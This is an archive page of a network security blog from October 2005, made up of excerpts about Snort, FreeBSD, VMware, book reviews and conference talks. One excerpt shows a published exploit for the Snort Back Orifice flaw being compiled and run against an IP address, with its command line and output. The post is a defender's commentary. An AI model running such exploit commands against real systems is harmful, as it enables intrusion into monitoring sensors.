I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sgu...
Senin, 31 Oktober 2005
Jumat, 28 Oktober 2005
First Hampton Roads, VA Snort Users Group Meeting
My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more detai...
FreeBSD 6.0-RELEASE Available Soon
According to this announcement by FreeBSD release engineer Scott Long, FreeBSD 6.0-RELEASE "will likely be announced by the end of the weekend or early next week, at the latest." This is great news. I plan to upgrade all of my 5.4 systems to 6.0 when it is available. I'll post my experienc...
Kamis, 27 Oktober 2005
New (IN)SECURE Magazine Features Bejtlich Article
The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class.It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share the sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ethereal to start network analysi...
Review of VMware Workstation 5 Handbook Posted
Amazon.com just posted my four star review of VMware Workstation 5 Handbook. From the review:"Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find their needs met. Those looking for in-depth coverage exceeding VMware's online documentation...
VMware Workstation Vnetsniffer
Did you know VMware Workstation ships with a sniffer? I should have know about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There's only 15 references in Google Groups, however.Vnetsniffer is very limited with regard to reporting. Here is sample output:C:\Program Files\VMware\VMware Workstation>vnetsnifferusage: vnetsniffer [/e] (/p "pvnID" | VMnet?)C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"Enter password for administrator:Attempting to start...
Rabu, 26 Oktober 2005
Bejtlich Books in HNS Contest
Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in the HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good lu...
Selasa, 25 Oktober 2005
Snort BO Exploit Published
As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4. orr:/home/richard$ ./THCsnortbo 66.93.110.10 1Snort BackOrifice PING exploit (version 0.3)by rd@thc.orgSelected target: 1 | manual testing gcc with -O0Sending exploit to 66.93.110.10Done.orr:/home/richard$ ./THCsnortbo 66.93.110.10 2Snort BackOrifice PING exploit (version 0.3)by rd@thc.orgSelected target: 2 | manual testing gcc with -O2Sending exploit to 66.93.110.10Done.Here...
Senin, 24 Oktober 2005
Reviews of Computer Security 20 Things Every Employee Should Know, 2nd Ed, The Symantec Guide to Home Internet Security Posted
The drought has ended. Amazon.com just posted my two newest reviews. First was Computer Security 20 Things Every Employee Should Know, 2nd Ed by Ben Rothke. I gave it three stars, but I would give the next edition higher ratings if Ben addresses my suggestions. From the review:Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be...
More on Engineering Disasters and Bird Flu
Here's another anecdote from the Engineering Disasters story I wrote about recently. In 1956 the cruise ship Andrea Doria was struck and sunk by the ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and the controls on radar systems were not illuminated. It is possible that the Stockholm radar operators misinterpreted the readings on their equipment, believing the Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one another...
Pre-Review Postscript
I neglected to mention a book I look forward to reading -- Essential SNMP, 2nd Ed by Douglas Mauro and Kevin Schmidt. Most of the technologies I deploy and use are passive monitoring systems. This book represents an active monitoring system, where SNMP is used to determine the status of network resources. I expect Wolfgang Barth's book on Nagios to also be helpful.Since mentioning the new Apress MySQL book yesterday, MySQL 5 is achieved general...
Bejtlich Speaking at RSA Conference 2006
My proposal to speak at the RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensi...
Minggu, 23 Oktober 2005
Latest Book Pre-Reviews
During the last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over the last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review them for Amazon.com. First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and...
Sabtu, 22 Oktober 2005
Further Thoughts on Engineering Disasters
My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of the show of the same title took a broader look at the problem. Three experts provided comments that resonated with me.First, Dr. Roger McCarthy of Exponent, Inc. offered the following story about problems with the Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with the weight of the lens on Earth and deflections caused by gravity. When Hubble was...
Excellent Pf Documentation
I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like the approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and then builds up the capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document.Incidentally, OpenBSD 3.8 will be available at a FTP server near you on 1 Novemb...
The Coming Snort Worm
This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort version 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about...
Jumat, 21 Oktober 2005
VMware Player Changes Everything
In the words of the immortal Joey -- "whoa." I just learned of, and tried, the new VMware Player. If you haven't heard of it yet, VMware player is a free program for Windows and Linux users that allows them to run a single VM on their host OS. VMware Player is like a stripped down version of VMware Workstation. It does not support snapshots, and the documentation says only one VM can run at a time (despite what the comparison chart implies).This...
VirtualWiFi and Monitoring
While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:orr:/root# ifconfig wi0 mediaopt monitor channel 6 uporr:/root# tcpdump -i wi0 -LData link types (use option -y to set): EN10MB (Ethernet) IEEE802_11 (802.11) IEEE802_11_RADIO (802.11 plus BSD radio information header)orr:/root# tcpdump -n -i wi0 -y IEEE802_11One of the students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because...
Commercial Rootkits Make NSM Even More Relevant
Last month I posted Rootkits Make NSM More Relevant Than Ever. A few weeks ago I spoke at a Cisco training event attended by over 400 sales engineers and broadcast to several hundred more. I built my presentation on the "NSM, Now More Than Ever" theme. Since Cisco is a network infrastructure company, my message resonated with them. I would have delivered the same message to Microsoft if asked, but I am not a 31337 BlueHat h@x0r. Today I learned...
Senin, 17 Oktober 2005
Useful Nmap Documentation
Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently the new Nmap man page is an excerpt from this book.By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not...
Minggu, 16 Oktober 2005
Register for 20 October ISSA-NoVA Meeting by Noon Tuesday
To my DC metro area readers: if you'd like to attend the local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be there to hear Paco Hope discuss FreeBSD and OpenB...
Jumat, 14 Oktober 2005
MySpace Worm Demonstrates NSM Principles
In my first book, the The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of these two facts, prevention eventually fails. In other words, intruders are cleverly figuring out ways to circumvent security of services you have never heard about in ways you could not imagine. As a result, defenses fail and monitoring is the only way to detect that failure and respond appropriately.The story Cross-Site Scripting Worm Hits MySpace is a perfect example...
Kamis, 13 Oktober 2005
Bejtlich Quotes in Sourcefire Acquisition Story
Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort."I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."That...
Selasa, 11 Oktober 2005
Brief Thought on Digital Security
I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had the following thought after writing that article. When an engineering catastrophe befalls the "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc. This...
SecurityMetrics Documents Security Cycles
Andrew Jaquith of SecurityMetrics.org posted an interesting story called Hamster Wheels of Pain. It's a follow-up to an earlier article. I think the present story is cool because Andrew collected and posted the security process "wheels" of 11 security vendors. I recognize Foundstone's in there, shown as a thumbnail at left. I think Andrew is a little too cynical regarding some of these process charts. Some are used to sell products, and often...
BSD Certification Group Publishes BSD Associate Exam Objectives
Last week the BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of the document explains its purpose:"This document introduces the BSD Associate (BSDA) examination and describes in considerable detail the objectives covered by the exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.While the testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all the details of each one....
FreeBSD 6.0-RC1 Available
I just read the announcement that FreeBSD 6.0-RC1 is available for download. There's a helpful link on the new front page that directly points to places to find the new release candidate. The 6.0 schedule does not list a release date, but the RC candidate announcement says RC1 will be the only release candidate. I expect to see 6.0-RELEASE arrive within the next two weeks. Great work FreeBSD release engineering team!FreeBSD 5.5, at least one...
TaoSecurity Blog on CNET Blog 100
I received word today that this blog was added to the CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking the last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CN...
Sabtu, 08 Oktober 2005
New FreeBSD Web Site Launched
I like the look of the new FreeBSD home page, but the daemon in the middle looks obnoxiously large compared to the rest of the content. I'd much rather see Beastie small and somewhere else, preferably in a corner or on the community page. FreeBSD is an operating system for professionals; I'd like to see it treated seriously for once. On a related note, I found this interview with Scott Long very interesti...
Thoughts on the Week's Security News
This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various...
Sabtu, 01 Oktober 2005
Real Digital Forensics and Shirts
This week I received a batch of TaoSecurity T-shirts for my Network Security Operations class. The back of the T-shirt is pictured at left. The front of the T-shirt shows the TaoSecurity logo. I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit the pubisher Addison-Wesley to review the table of contents, the preface, and also download the first chapter. It's a review of Windows live response.I...
Comment Verification Activated
Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting them all. This is the latest salvo in an escalating battle which starting which intermittent spam comments several months ago. To try to reduce these automated attacks in the future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank y...
Langganan:
Postingan (Atom)
